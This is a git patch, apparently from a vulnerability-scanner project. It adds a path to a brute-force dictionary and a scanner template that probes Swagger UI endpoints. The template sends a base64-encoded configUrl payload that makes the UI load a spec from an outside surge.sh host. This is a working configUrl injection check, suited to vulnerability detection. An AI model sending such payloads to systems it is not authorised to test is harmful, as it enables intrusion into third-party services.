From ae21f31af1c2e4fa3685f8d226aff47a9c539dab Mon Sep 17 00:00:00 2001
From: hktalent <18223385+hktalent@users.noreply.github.com>
Date: Thu, 9 Feb 2023 16:48:40 +0800
Subject: [PATCH] x 2023-02-09

---
 brute/dicts/filedic.txt   |  1 +
 config/51pwn/swagger.yaml | 29 +++++++++++++++++++++++++++++
 2 files changed, 30 insertions(+)
 create mode 100644 config/51pwn/swagger.yaml

diff --git a/brute/dicts/filedic.txt b/brute/dicts/filedic.txt
index b3615f40f..e9d021348 100644
--- a/brute/dicts/filedic.txt
+++ b/brute/dicts/filedic.txt
@@ -102,6 +102,7 @@
 /apps/frontend/modules/main/templates/loginSuccess.php
 /apps/frontend/modules/main/validate/login.yml
 /auth/login
+/classicapi/doc/
 /auth/login/github
 /auth/login/google
 /auth/login/sentry/
diff --git a/config/51pwn/swagger.yaml b/config/51pwn/swagger.yaml
new file mode 100644
index 000000000..6b6c496eb
--- /dev/null
+++ b/config/51pwn/swagger.yaml
@@ -0,0 +1,29 @@
+id: swagger_51pwn
+
+info:
+  name: swagger api
+  author: 51pwn
+  severity: critical
+  description: |
+    swagger api
+
+requests:
+  - raw:
+      - |
+        GET /classicapi/doc/ HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        GET /classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ== HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: or
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        words:
+          - 'swagger.yaml'
+        condition: and
+      - type: word
+        words:
+          - 'exuberant-ice.surge.sh'
+        condition: and
\ No newline at end of file